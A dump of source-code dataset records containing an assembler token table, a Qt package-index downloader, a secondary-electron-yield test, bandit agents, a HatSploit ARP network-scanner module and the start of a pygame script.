\n * In pass2, the conversion into object code cannot be done by this class alone; it needs the information in the symbolTable and instTable, so those tables are linked here.
\n * One instance is allocated per section.\n *\n\"\"\"\n\n\nclass TokenTable:\n    locCount = 0  # class variable declaration\n    \"\"\"\n    * On initialization, links the symTable, literalTable and instTable.\n    * @param symTab : the symbol table connected to this section\n    * @param literalTab : the literal table connected to this section\n    * @param instTab : the instTable in which the instruction specifications are defined\n    \"\"\"\n    def __init__(self, symT, literalT, instT):\n        # Link the tables needed when handling Tokens.\n        self.symTab = symT\n        self.literalTab = literalT\n        self.instTab = instT\n        self.literCheck = []  # String\n        TokenTable.locCount = 0  # init\n        # Space in which each line is split by meaning and analyzed.\n        self.tokenList = []  # create the tokenList\n\n    \"\"\" global variables \"\"\"\n    MAX_OPERAND = 3\n\n\n    # declared for readability of the bit manipulation (static)\n    nFlag = 32\n    iFlag = 16\n    xFlag = 8\n    bFlag = 4\n    pFlag = 2\n    eFlag = 1\n\n    '''\n    * Takes a plain string, splits it into Token units and appends it to the tokenList.\n    * @param line : the raw, unsplit string\n    '''\n\n    def putToken(self, line):\n        tok = Token()\n        tok.parsing(line)\n        tok.setLocation(TokenTable.locCount)\n        self.tokenList.append(tok)\n\n        # After this line's tokens are parsed, add the Symbol if one is present\n        if tok.label != \".\" and tok.label != \" \" and tok.label != \"\":\n            self.symTab.putSymbol(tok.label, tok.location)\n\n        # After this line's tokens are parsed, add the literal if one is present\n        if len(tok.operand) > 0 and tok.operand[0] != \"\" and tok.operand[0].find('=') != -1 :\n            self.literalTab.putLiteral(tok.operand[0], tok.location)\n            self.literCheck.append(tok.operand[0])\n\n        # After this line's tokens are parsed, set the nixbpe bits\n        if self.instTab.searchOpcode(tok.operator) > 0 or tok.operator == \"LDA\":\n            if self.instTab.searchFormat(tok.operator) < 3:\n                tok.nixbpe = 0\n            # nixbpe is only set for formats 3 and above\n            else:\n                # set the n, i flags\n                if tok.operand[0][0] == '#':\n                    tok.setFlag(self.nFlag, 0)\n                    tok.setFlag(self.iFlag, 1)\n                elif tok.operand[0][0] == '@':\n                    tok.setFlag(self.nFlag, 1)\n                    tok.setFlag(self.iFlag, 0)\n                else:\n                    tok.setFlag(self.nFlag, 1)\n                    tok.setFlag(self.iFlag, 1)\n\n                # set the x flag\n                if len(tok.operand) > 1 and tok.operand[1].find(\"X\") != -1:\n                    tok.setFlag(self.xFlag, 1)\n                else:\n                    tok.setFlag(self.xFlag, 0)\n\n                # set the p flag\n                if tok.operand[0][0] != '#' and tok.operator[0] != '+' and tok.operator != \"RSUB\":\n                    tok.setFlag(self.pFlag, 1)\n                else:\n                    tok.setFlag(self.pFlag, 0)\n\n                # set the e flag\n                if tok.operator[0] == '+':\n                    tok.setFlag(self.eFlag, 1)\n                else:\n                    tok.setFlag(self.eFlag, 0)\n\n        # print(tok.operator + \" \" + tok.operand[1] + \" \" + Integer.toHexString(tok.nixbpe))\n\n        # After this line's tokens are parsed, check the operator and update locCount\n        locationlen = self.calcLocation(tok)\n        if locationlen > 0:\n            TokenTable.locCount += locationlen\n\n    def calcLocation(self, token):\n        len = self.instTab.searchFormat(token.operator)\n        if len > 0:\n            return len\n        else:\n            if token.operator == \"RESW\" or token.operator == \"WORD\":\n                len = 3\n\n            elif token.operator == \"RESB\":\n                len = int(token.operand[0])\n\n\n            elif token.operator == \"BYTE\":\n                len = 1\n\n\n            elif token.operator == \"LTORG\":\n                len = self.literalTab.literalCount\n                self.literalTab.setLiteralCount(0)\n                count = 0\n                for litCheck in self.literCheck:\n                    if litCheck[1:2] == 'C' :\n                        len = 3\n                    else :\n                        len = 1\n                    self.literalTab.modifyLiteral(litCheck, TokenTable.locCount + (count * len))\n                    count += 1\n\n            elif token.operator == \"END\":\n                len = self.literalTab.literalCount\n                self.literalTab.setLiteralCount(0)\n                count = 0\n                for litCheck in self.literCheck:\n                    self.literalTab.modifyLiteral(litCheck, token.location)\n                    count += 1\n\n            elif token.operator == \"EQU\":\n                if token.operand[0] == \"*\":\n                    len = 0\n\n                else:\n\n                    tokenizer = RegexpTokenizer(\"-\", gaps=True)\n                    tokens = 
tokenizer.tokenize(token.operand[0])\n\n                    value1 = self.symTab.search(tokens[0])\n                    value2 = self.symTab.search(tokens[1])\n                    len = value1 - value2\n                    self.symTab.modifySymbol(token.label, len)\n                    len = 0\n\n            else:\n                len = -1\n\n        return len\n\n    def printTokenList(self):\n        for t in self.tokenList:\n            print(format(int(t.location), 'X') + \"\\t\" + t.label + \"\\t\" + t.operator + \"\\t\" + t.operand[0])\n\n    '''\n    * Returns the Token at the given index in the tokenList.\n    * @param index\n    * @return : the Token object holding the analyzed code for that index\n    '''\n\n    def getToken(self, index):\n        return self.tokenList[index]\n\n    def setBytes(self, index, num):\n        self.tokenList[index].setByteSize(num)\n\n    def setObjcode(self, index, objCode):\n        self.tokenList[index].setObjectCode(objCode)\n\n    \"\"\"\n    * Used during the Pass2 stage.\n    * Generates the object code by consulting the instruction table, symbol table, literal table and so on, and stores it.\n    * @param index\n    \"\"\"\n\n    def makeObjectCode(self, index):\n\n        resultOb = \"\"\n\n        if self.instTab.searchFormat(self.getToken(index).operator) == 2:\n            self.setBytes(index, 4)\n            opcode = self.instTab.searchOpcode(self.getToken(index).operator)\n            opcodeStr = \"%X\" % opcode\n            resultOb += opcodeStr\n\n            for i in self.getToken(index).operand :\n                if i == \"X\":\n                    resultOb += \"1\"\n                elif i == \"A\":\n                    resultOb += \"0\"\n                elif i == \"S\":\n                    resultOb += \"4\"\n                else:  # the \"T\" case\n                    resultOb += \"5\"\n\n            if len(resultOb) < self.getToken(index).byteSize:\n                resultOb += \"0\"\n\n            self.setObjcode(index, resultOb)\n\n        elif self.instTab.searchFormat(self.getToken(index).operator) == 3:\n            self.setBytes(index, 6)\n            disA = 0\n            opcode = self.instTab.searchOpcode(self.getToken(index).operator)\n            oprand = self.getToken(index).operand[0]\n\n            if oprand[0] == '@':\n                oprand = oprand[1:]\n\n            elif oprand[0] == '#':\n                disA = int(oprand[1:])\n\n            elif oprand[0] == '=':\n                TA = self.literalTab.search(oprand)\n                PA = self.getToken(index + 1).location\n                disA = TA - PA\n\n            else:\n                TA = self.symTab.search(oprand)\n                PA = self.getToken(index + 1).location\n                disA = TA - PA\n\n            # leading part of the object code\n            calcObjCode = opcode * 16 + self.getToken(index).nixbpe\n            if len(\"%X\" % calcObjCode) < 3:\n                resultOb += \"0\"\n            resultOb += \"%X\" % calcObjCode\n\n            # trailing part of the object code\n            if opcode == 76:  # handle RSUB\n                resultOb += \"000\"\n\n            elif disA < 0:  # negative displacement\n                str = hex((disA + (1 << 16)) % (1 << 16))\n                str = str[-3:]  # keep only the last 3 hex digits\n                resultOb += str.upper()\n\n            elif len(\"%X\" % disA) <= 3:  # <= so an exactly 3-digit displacement is not reported as an error\n                str = \"0\" * (3 - len(\"%X\" % disA))\n                resultOb += str\n                resultOb += \"%X\" % disA\n\n\n            else:\n                print(\"disA error\")\n\n            self.setObjcode(index, resultOb)\n\n\n        elif self.instTab.searchFormat(self.getToken(index).operator) == 4:\n            self.setBytes(index, 8)\n            disA = \"00000\"\n            opcode = self.instTab.searchOpcode(self.getToken(index).operator)\n\n            # leading part of the object code\n            calcObjCode = opcode * 16 + self.getToken(index).nixbpe\n            if opcode == 0:  # special-case handling for LDA\n                resultOb += \"0\"\n            resultOb += \"%X\" % calcObjCode\n\n            # trailing part of the object code\n            resultOb += disA\n\n            self.setObjcode(index, resultOb)\n\n\n        elif self.getToken(index).operator == \"LTORG\" or self.getToken(index).operator == \"END\":\n            resultOb += self.literalTab.getlitAscii(self.getToken(index).location)\n            self.setBytes(index, len(resultOb))\n            self.setObjcode(index, resultOb)\n\n\n        elif self.getToken(index).operator == \"BYTE\":\n            resultOb += self.getToken(index).operand[0][2:4]\n            self.setBytes(index, 2)\n            self.setObjcode(index, resultOb)\n\n\n        elif self.getToken(index).operator == \"WORD\":\n            resultOb += \"000000\"\n            self.setBytes(index, 6)\n            
self.setObjcode(index, resultOb)\n\n        # test print\n        #print('%d\\t%s\\t%s' % (index, self.getToken(index).operator, self.getToken(index).objectCode))\n\n    \"\"\"\n    * Returns the object code for the given index number.\n    * @param index\n    * @return : object code\n    \"\"\"\n\n    def getObjectCode(self, index):\n        return self.tokenList[index].objectCode\n\n\n","sub_path":"202-SP-Project1c/TokenTable.py","file_name":"TokenTable.py","file_ext":"py","file_size_in_byte":10684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"68128970","text":"#!/usr/bin/env python\n#\n# Copyright (C) 2018 Linus Jahn \n# Copyright (C) 2019 Hiroshi Miura \n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy of\n# this software and associated documentation files (the \"Software\"), to deal in\n# the Software without restriction, including without limitation the rights to\n# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of\n# the Software, and to permit persons to whom the Software is furnished to do so,\n# subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\n# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR\n# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER\n# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\n# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\nimport logging\nimport requests\nimport traceback\nimport xml.etree.ElementTree as ElementTree\nfrom six import StringIO\n\n\nclass QtPackage:\n    name = \"\"\n    url = \"\"\n    archive = \"\"\n    desc = \"\"\n    mirror = None\n\n    def __init__(self, name, archive_url, archive, package_desc, has_mirror=False):\n        self.name = name\n        self.url = archive_url\n        self.archive = archive\n        self.desc = package_desc\n        self.has_mirror = has_mirror\n\n\nclass QtArchives:\n    BASE_URL = 'https://download.qt.io/online/qtsdkrepository/'\n    archives = []\n    base = None\n\n    def __init__(self, os_name, qt_version, target, arch, mirror=None):\n        self.qt_version = qt_version\n        self.target = target\n        self.arch = arch\n        if mirror is not None:\n            self.has_mirror = True\n            self.base = mirror + '/online/qtsdkrepository/'\n        else:\n            self.base = self.BASE_URL\n        qt_ver_num = qt_version.replace(\".\", \"\")\n\n        # install mingw runtime package\n        if arch in ['win64_mingw73', 'win32_mingw73', 'win64_mingw53', 'win32_mingw53']:\n            archive_url = self.base + 'windows_x86/desktop/tools_mingw/'\n            update_xml_url = \"{0}Updates.xml\".format(archive_url)\n            try:\n                r = requests.get(update_xml_url)\n            except requests.exceptions.ConnectionError as e:\n                print(\"Caught download error: %s\" % e.args)\n                exc_buffer = StringIO()\n                traceback.print_exc(file=exc_buffer)\n                logging.error('Download error:\\n%s', exc_buffer.getvalue())\n                raise e\n            else:\n                self.update_xml = ElementTree.fromstring(r.text)\n                for packageupdate in self.update_xml.iter(\"PackageUpdate\"):\n                    name = packageupdate.find(\"Name\").text\n                    if name.split(\".\")[-1] != arch:\n                        continue\n                    downloadable_archives = packageupdate.find(\"DownloadableArchives\").text.split(\", \")\n                    full_version = packageupdate.find(\"Version\").text\n                    split_version = full_version.split(\"-\")  # split() is a method call, not a subscript\n                    named_version = 
split_version[0] + \"-\" + split_version[1]\n package_desc = packageupdate.find(\"Description\").text\n for archive in downloadable_archives:\n # ex. 7.3.0-1x86_64-7.3.0-release-posix-seh-rt_v5-rev0.7z\n package_url = archive_url + name + \"/\" + named_version + archive\n self.archives.append(QtPackage(name, package_url, archive, package_desc,\n has_mirror=(mirror is not None)))\n # Ordinary packages\n if os_name == 'windows':\n archive_url = self.base + os_name + '_x86/' + target + '/' + 'qt5_' + qt_ver_num + '/'\n else:\n archive_url = self.base + os_name + '_x64/' + target + '/' + 'qt5_' + qt_ver_num + '/'\n\n # Get packages index\n update_xml_url = \"{0}Updates.xml\".format(archive_url)\n try:\n r = requests.get(update_xml_url)\n except requests.exceptions.ConnectionError as e:\n print(\"Caught download error: %s\" % e.args)\n exc_buffer = StringIO()\n traceback.print_exc(file=exc_buffer)\n logging.error('Download error:\\n%s', exc_buffer.getvalue())\n raise e\n else:\n self.update_xml = ElementTree.fromstring(r.text)\n for packageupdate in self.update_xml.iter(\"PackageUpdate\"):\n name = packageupdate.find(\"Name\").text\n if name.split(\".\")[-1] != arch:\n continue\n if name.split(\".\")[-2] == \"debug_info\":\n continue\n if packageupdate.find(\"DownloadableArchives\").text is None:\n continue\n if name == \"qt.qt5.{}.{}\".format(qt_ver_num, arch) or name == \"qt.{}.{}\".format(qt_ver_num, arch):\n # basic packages\n pass\n else:\n # optional packages: FIXME: check option whether install or not\n pass\n downloadable_archives = packageupdate.find(\"DownloadableArchives\").text.split(\", \")\n full_version = packageupdate.find(\"Version\").text\n package_desc = packageupdate.find(\"Description\").text\n for archive in downloadable_archives:\n package_url = archive_url + name + \"/\" + full_version + archive\n self.archives.append(QtPackage(name, package_url, archive, package_desc,\n has_mirror=(mirror is not None)))\n\n if len(self.archives) == 0:\n print(\"Error while parsing package information!\")\n exit(1)\n\n def get_archives(self):\n return self.archives\n\n def get_target_config(self):\n return self.qt_version, self.target, self.arch\n","sub_path":"aqt/archives.py","file_name":"archives.py","file_ext":"py","file_size_in_byte":6207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"275424763","text":"import sys\nif '../..' not in sys.path:\n sys.path.append('../..')\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sec_emission_model_furman_pivi as fp\nimport mystyle as ms\nfrom scipy.constants import e as qe\n\nplt.close('all')\nms.mystyle(12)\nlinewid = 2\n\nme = 9.10938356e-31\n\n\ndef del_elas_ECLOUD(energy, R_0=0.7, E_max=332., E_0=150.):\n del_elas = R_0 * ((np.sqrt(energy) - np.sqrt(energy + E_0)) / (np.sqrt(energy) + np.sqrt(energy + E_0)))**2\n return del_elas\n\n\ndef del_true_ECLOUD(energy, del_max, s=1.35, E_max=332., costheta=1.):\n angular_factor = np.exp(0.5 * (1. - costheta))\n E_max_tilde = E_max * (1. + 0.7 * (1. 
- costheta))\n x = energy / E_max_tilde\n del_true = del_max * s * x / (s - 1 + x**s)\n return del_true * angular_factor\n\n\nfurman_pivi_surface_tweak = {\n 'use_modified_sigmaE': False,\n 'use_ECLOUD_theta0_dependence': True,\n 'use_ECLOUD_energy': False,\n 'conserve_energy': False,\n 'exclude_rediffused': True,\n 'choice': 'poisson',\n 'M_cut': 10,\n 'p_n': np.array([1.21963859, 1.66070543, 1.21935223, 1.09987752, 4.28158656, 1.02052557, 1.0247471, 1.02307995, 29.93491271, 1.02045612]),\n 'eps_n': np.array([7.44033631e+00, 2.47339424e+00, 7.45004962e+00, 1.63618903e+01, 4.97986255e-01, 7.96170380e+01, 6.60354258e+01, 7.08053955e+01, 5.64779654e-02, 7.98873331e+01]),\n # Parameters for backscattered electrons\n 'p1EInf': 0.002158, # Changed this\n 'p1Ehat': 0.709633, # Changed this\n 'eEHat': 0.,\n 'w': 46.028959, # Changed this\n 'p': 0.468907, # Changed this\n 'e1': 0., # Changed this\n 'e2': 2.,\n 'sigmaE': 2.,\n # Parameters for rediffused electrons\n 'p1RInf': 0.2,\n 'eR': 0.041,\n 'r': 0.104,\n 'q': 0.5,\n 'r1': 0.26,\n 'r2': 2.,\n # Parameters for true secondaries\n 'deltaTSHat': 1.8,\n 'eHat0': 332.,\n 's': 1.35,\n 't1': 0.5, # 0.706340, # Changed this\n 't2': 1., #0.715223, # Changed this\n 't3': 0.7,\n 't4': 1.}\n\nfurman_pivi_surface_LHC = {\n 'use_modified_sigmaE': False,\n 'use_ECLOUD_theta0_dependence': False,\n 'use_ECLOUD_energy': False,\n 'conserve_energy': False,\n 'exclude_rediffused': False,\n 'choice': 'poisson',\n 'M_cut': 10,\n 'p_n': np.array([2.5, 3.3, 2.5, 2.5, 2.8, 1.3, 1.5, 1.5, 1.5, 1.5]),\n 'eps_n': np.array([1.5, 1.75, 1., 3.75, 8.5, 11.5, 2.5, 3., 2.5, 3.]),\n # Parameters for backscattered electrons\n 'p1EInf': 0.02,\n 'p1Ehat': 0.496,\n 'eEHat': 0.,\n 'w': 60.86,\n 'p': 1.,\n 'e1': 0.26,\n 'e2': 2.,\n 'sigmaE': 2.,\n # Parameters for rediffused electrons\n 'p1RInf': 0.2,\n 'eR': 0.041,\n 'r': 0.104,\n 'q': 0.5,\n 'r1': 0.26,\n 'r2': 2.,\n # Parameters for true secondaries\n 'deltaTSHat': 1.8848,\n 'eHat0': 332.,\n 's': 1.35,\n 't1': 0.5, # t1 and t2 based on taylor expansion\n 't2': 1., # of PyECLOUD formula for E_max(theta)\n 't3': 0.7,\n 't4': 1.}\n\nfurman_pivi_surface = {\n 'use_modified_sigmaE': False,\n 'use_ECLOUD_theta0_dependence': False,\n 'use_ECLOUD_energy': False,\n 'conserve_energy': False,\n 'exclude_rediffused': False,\n 'choice': 'poisson',\n 'M_cut': 10,\n 'p_n': np.array([2.5, 3.3, 2.5, 2.5, 2.8, 1.3, 1.5, 1.5, 1.5, 1.5]),\n 'eps_n': np.array([1.5, 1.75, 1., 3.75, 8.5, 11.5, 2.5, 3., 2.5, 3.]),\n 'p1EInf': 0.02,\n 'p1Ehat': 0.496,\n 'eEHat': 0.,\n 'w': 60.86,\n 'p': 1.,\n 'e1': 0.26,\n 'e2': 2.,\n 'sigmaE': 2.,\n 'p1RInf': 0.2,\n 'eR': 0.041,\n 'r': 0.104,\n 'q': 0.5,\n 'r1': 0.26,\n 'r2': 2.,\n 'deltaTSHat': 1.6 - 0.22, #1.8848,\n 'eHat0': 276.8,\n 's': 1.54,\n 't1': 0.66,\n 't2': 0.8,\n 't3': 0.7,\n 't4': 1.}\n\n# Scaled py POSINST to del_tot_max = 1.6\nfurman_pivi_surface_scaled = {\n 'use_modified_sigmaE': False,\n 'use_ECLOUD_theta0_dependence': False,\n 'use_ECLOUD_energy': False,\n 'conserve_energy': False,\n 'exclude_rediffused': False,\n 'choice': 'poisson',\n 'M_cut': 10,\n 'p_n': np.array([2.5, 3.3, 2.5, 2.5, 2.8, 1.3, 1.5, 1.5, 1.5, 1.5]),\n 'eps_n': np.array([1.5, 1.75, 1., 3.75, 8.5, 11.5, 2.5, 3., 2.5, 3.]),\n 'p1EInf': 0.015294, # Changed this\n 'p1Ehat': 0.382362, # Changed this\n 'eEHat': 0.,\n 'w': 60.86,\n 'p': 1.,\n 'e1': 0.26,\n 'e2': 2.,\n 'sigmaE': 2.,\n 'p1RInf': 0.152945, # Changed this\n 'eR': 0.041,\n 'r': 0.104,\n 'q': 0.5,\n 'r1': 0.26,\n 'r2': 2.,\n 'deltaTSHat': 1.441353, # Changed this\n 'eHat0': 
276.8,\n 's': 1.54,\n 't1': 0.66,\n 't2': 0.8,\n 't3': 0.7,\n 't4': 1.}\n\nflag_costheta_delta_scale = True\nflag_costheta_Emax_shift = True\n\nsey_mod = fp.SEY_model_furman_pivi(E_th=35., sigmafit=1.0828, mufit=1.6636, secondary_angle_distribution='cosine_3D',\n switch_no_increase_energy=0, thresh_low_energy=-1,\n furman_pivi_surface=furman_pivi_surface, flag_costheta_delta_scale=flag_costheta_delta_scale,\n flag_costheta_Emax_shift=flag_costheta_Emax_shift)\n\n\ndef extract_sey_curves(n_rep, E_impact_eV_test, cos_theta_test, charge, mass):\n\n deltas = {}\n for etype in list(sey_mod.event_types.keys()):\n etype_name = sey_mod.event_types[etype]\n deltas[etype_name] = np.zeros((len(cos_theta_test), len(E_impact_eV_test)))\n print('Extracting SEY curves...')\n for i_ct, ct in enumerate(cos_theta_test):\n print(('%d/%d' % (i_ct + 1, len(cos_theta_test))))\n for i_ene, Ene in enumerate(E_impact_eV_test):\n\n nel_impact = np.ones(n_rep)\n # Assuming normal is along x\n v_mod = np.sqrt(2 * Ene * qe / mass) * np.ones_like(nel_impact)\n vx = v_mod * ct\n vy = v_mod * np.sqrt(1 - ct * ct)\n\n nel_emit_tot_events, event_type, event_info,\\\n nel_replace, x_replace, y_replace, z_replace, vx_replace, vy_replace, vz_replace, i_seg_replace,\\\n nel_new_MPs, x_new_MPs, y_new_MPs, z_new_MPs, vx_new_MPs, vy_new_MPs, vz_new_MPs, i_seg_new_MPs =\\\n sey_mod.impacts_on_surface(\n mass=mass, nel_impact=nel_impact, x_impact=nel_impact * 0, y_impact=nel_impact * 0, z_impact=nel_impact * 0,\n vx_impact=vx * np.ones_like(nel_impact),\n vy_impact=vy * np.ones_like(nel_impact),\n vz_impact=nel_impact * 0,\n Norm_x=np.ones_like(nel_impact), Norm_y=np.zeros_like(nel_impact),\n i_found=np.int_(np.ones_like(nel_impact)),\n v_impact_n=vx * np.ones_like(nel_impact),\n E_impact_eV=Ene * np.ones_like(nel_impact),\n costheta_impact=ct * np.ones_like(nel_impact),\n nel_mp_th=1,\n flag_seg=True)\n\n for etype in list(sey_mod.event_types.keys()):\n etype_name = sey_mod.event_types[etype]\n thisdelta = deltas[etype_name]\n thisdelta[i_ct, i_ene] = np.sum(\n nel_emit_tot_events[event_type == etype]) / np.sum(nel_impact)\n deltas[etype_name] = thisdelta\n\n print('Done extracting SEY curves.')\n\n return deltas\n\n\ncos_theta_test = np.linspace(0, 1., 10)\nE_impact_eV_test = np.array(list(np.arange(0, 499., 5.)) + list(np.arange(500., 2000, 25.)))\nn_rep = int(1e3)\n\ndeltas = extract_sey_curves(n_rep, E_impact_eV_test, cos_theta_test, charge=qe, mass=me)\ndel_true_mat = deltas['true']\ndel_elast_mat = deltas['elast']\ndel_rediff_mat = deltas['rediff']\ndel_absorb_mat = deltas['absorb']\n\nplt.close('all')\nms.mystyle_arial()\n\nfig1 = plt.figure(1, figsize=(3 * 8, 2 * 8))\nfig1.set_facecolor('w')\nsp1 = fig1.add_subplot(2, 3, 1)\nsp2 = fig1.add_subplot(2, 3, 2, sharex=sp1)\nsp3 = fig1.add_subplot(2, 3, 3, sharex=sp1)\nsp4 = fig1.add_subplot(2, 3, 4, sharex=sp1)\nsp5 = fig1.add_subplot(2, 3, 5, sharex=sp1)\nsp6 = fig1.add_subplot(2, 3, 6, sharex=sp1)\n\nfor i_ct, ct in enumerate(cos_theta_test):\n thiscol = ms.colorprog(i_ct, len(cos_theta_test))\n label = 'costheta=%.2f' % ct\n sp1.plot(E_impact_eV_test, del_true_mat[i_ct, :], color=thiscol, label=label, linewidth=linewid)\n sp2.plot(E_impact_eV_test, del_elast_mat[i_ct, :], color=thiscol, label=label, linewidth=linewid)\n sp3.plot(E_impact_eV_test, del_rediff_mat[i_ct, :], color=thiscol, label=label, linewidth=linewid)\n sp4.plot(E_impact_eV_test, del_absorb_mat[i_ct, :], color=thiscol, label=label, linewidth=linewid)\n sp5.plot(E_impact_eV_test, del_true_mat[i_ct, :] + 
del_rediff_mat[i_ct, :] + del_elast_mat[i_ct, :], color=thiscol, label=label, linewidth=linewid)\n sp6.plot(E_impact_eV_test, del_true_mat[i_ct, :] + del_elast_mat[i_ct, :], color=thiscol, label=label, linewidth=linewid)\n\nsp3.plot(0, 0, 'white', label='Model')\nsp1.set_ylabel('Delta true')\nsp2.set_ylabel('Delta elast')\nsp3.set_ylabel('Delta rediff')\nsp4.set_ylabel('Delta absorb')\nsp5.set_ylabel('Delta total')\nsp6.set_ylabel(r'$\\delta_{ts} + \\delta_{e}$')\n\nfor sp in [sp1, sp2, sp3, sp4, sp5, sp6]:\n sp.grid(True)\n sp.set_xlabel('Electron energy [eV]')\n\nplt.subplots_adjust(right=0.99, left=.05)\n\ntest_obj = sey_mod\n\nenergy = np.linspace(0., 2000, num=int(1e5))\n\nfor costheta in np.linspace(0, 1., 10):\n delta_ts_vec = test_obj.delta_ts(energy, costheta)\n delta_e_vec = test_obj.delta_e(energy, costheta)\n delta_r_vec = test_obj.delta_r(energy, costheta)\n\n sp2.plot(energy, delta_e_vec, color='k', linewidth=linewid)\n sp3.plot(energy, delta_r_vec, color='k', linewidth=linewid)\n sp1.plot(energy, delta_ts_vec, color='k', linewidth=linewid)\n sp5.plot(energy, delta_r_vec + delta_ts_vec + delta_e_vec, color='k', linewidth=linewid)\n sp6.plot(energy, delta_ts_vec + delta_e_vec, color='k', linewidth=linewid)\n\nsp2.plot(energy, del_elas_ECLOUD(energy), '--', color='r', linewidth=linewid, label='ECLOUD model')\nfor ct in cos_theta_test:\n sp1.plot(energy, del_true_ECLOUD(energy, del_max=test_obj.deltaTSHat, costheta=ct), '--', color='r', linewidth=linewid, label='ECLOUD model')\nsp2.legend(loc='best', prop={'size': 14})\n\nplt.suptitle('SEY extraction tests: Furman-Pivi model \\nexclude_rediffused=%s' % str(sey_mod.exclude_rediffused), fontsize=30)\n\nplt.show()\n","sub_path":"testing/tests_modules/010_test_Furman_Pivi_sey_curves.py","file_name":"010_test_Furman_Pivi_sey_curves.py","file_ext":"py","file_size_in_byte":10190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"614057759","text":"import random\nimport numpy as np\n\nclass NaiveGambler(object):\n \"\"\"The naive gambler just randomly selects a lever on each play.\"\"\"\n def __init__(self, numLevers):\n self.numLevers = numLevers\n\n def play(self, pull):\n pull(random.randrange(self.numLevers))\n\n def report(self):\n return \"\"\n\nclass ExactAverageGambler(object):\n def __init__(self, numLevers):\n self.exploreRate = 0.1\n self.actualPayouts = np.zeros([numLevers])\n self.numPulls = np.ones([numLevers])\n self.stopLearningAt = 10000\n\n def play(self, pull):\n r = random.random()\n numPulls = self.numPulls.sum()\n explore = r < self.exploreRate and numPulls < self.stopLearningAt\n if explore:\n lever = random.randrange(len(self.actualPayouts))\n else:\n lever = (self.actualPayouts / self.numPulls).argmax()\n payout = pull(lever)\n self.numPulls[lever] += 1\n self.actualPayouts[lever] += payout\n\n def report(self):\n return str(self.actualPayouts / self.numPulls)\n\nclass BasicEstimatingGambler(object):\n def __init__(self, numLevers):\n self.learningRate = 0.1\n self.exploreRate = 0.1\n self.estimatedPayouts = np.zeros([numLevers])\n\n def play(self, pull):\n r = random.random()\n explore = r < self.exploreRate\n if explore:\n # We're going to explore, so choose uniform-random from possible moves.\n lever = random.randrange(len(self.estimatedPayouts))\n payout = pull(lever)\n # Update estimate of expected payouts\n difference = payout - self.estimatedPayouts[lever]\n self.estimatedPayouts[lever] += self.learningRate * difference\n else:\n # We're going to 
exploit (use the maximum)\n # http://stackoverflow.com/questions/42071597/numpy-argmax-random-tie-breaking\n lever = np.random.choice(np.flatnonzero(self.estimatedPayouts == self.estimatedPayouts.max()))\n payout = pull(lever)\n\n def report(self):\n return str(self.estimatedPayouts)\n\nif __name__ == \"__main__\":\n from kbandit import bandit5a\n from casino import evaluate\n evaluate(NaiveGambler, bandit5a)\n evaluate(BasicEstimatingGambler, bandit5a)\n evaluate(ExactAverageGambler, bandit5a)\n","sub_path":"bandits/agents.py","file_name":"agents.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"60164585","text":"#!/usr/bin/env python3\n\n#\n# This module requires HatSploit: https://hatsploit.netlify.app\n# Current source: https://github.com/EntySec/HatSploit\n#\n\nimport scapy.all\n\nfrom hatsploit.lib.module import Module\n\n\nclass HatSploitModule(Module):\n details = {\n 'Name': \"Network Scanner\",\n 'Module': \"auxiliary/multi/scanner/network_scanner\",\n 'Authors': [\n 'Ivan Nikolsky (enty8080) - module developer'\n ],\n 'Description': \"Scan local network.\",\n 'Comments': [\n ''\n ],\n 'Platform': \"multi\",\n 'Risk': \"low\"\n }\n\n options = {\n 'RANGE': {\n 'Description': \"IP range.\",\n 'Value': \"192.168.1.1/24\",\n 'Type': \"ipv4_range\",\n 'Required': True\n },\n 'TIMEOUT': {\n 'Description': \"Timeout to scan.\",\n 'Value': 10,\n 'Type': \"number\",\n 'Required': True\n }\n }\n\n def run(self):\n ip_range, timeout = self.parse_options(self.options)\n\n self.output_process(\"Scanning local network...\")\n\n try:\n arp = scapy.all.ARP(pdst=ip_range)\n ether = scapy.all.Ether(dst=\"ff:ff:ff:ff:ff:ff\")\n result = scapy.all.srp(ether / arp, timeout=float(timeout), verbose=False)[0]\n\n if len(result) > 0:\n net_data = list()\n headers = (\"Host\", \"MAC\")\n for _, received in result:\n net_data.append((received.psrc, received.hwsrc))\n self.print_table(\"Network Devices\", headers, *net_data)\n else:\n self.output_warning(\"No hosts detected in local network.\")\n except Exception:\n self.output_error(\"Failed to scan local network!\")\n","sub_path":"hatsploit/modules/auxiliary/multi/scanner/network_scanner.py","file_name":"network_scanner.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"460027474","text":"#coding: latin1\r\n\r\n'''\r\n@author: Lars Heppert\r\n'''\r\n\r\nimport pygame, sys, math\r\n\r\nwindowMargin = 30\r\nwindowWidth = 800\r\nwindowHeight = 400\r\nwindowCenter = windowWidth/2, 40\r\n\r\nbackgroundColor = (0, 0, 0)\r\nwhite = (255, 255, 255)\r\n\r\ndef handleEvents():\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n sys.exit(0)\r\n elif event.type == pygame.KEYDOWN:\r\n sys.exit(0)\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n sys.exit(0)\r\n \r\ndef getCirclePoint(position, scale, cursorLength):\r\n degrees = getWirePositionDegrees(position, scale)\r\n xPos = 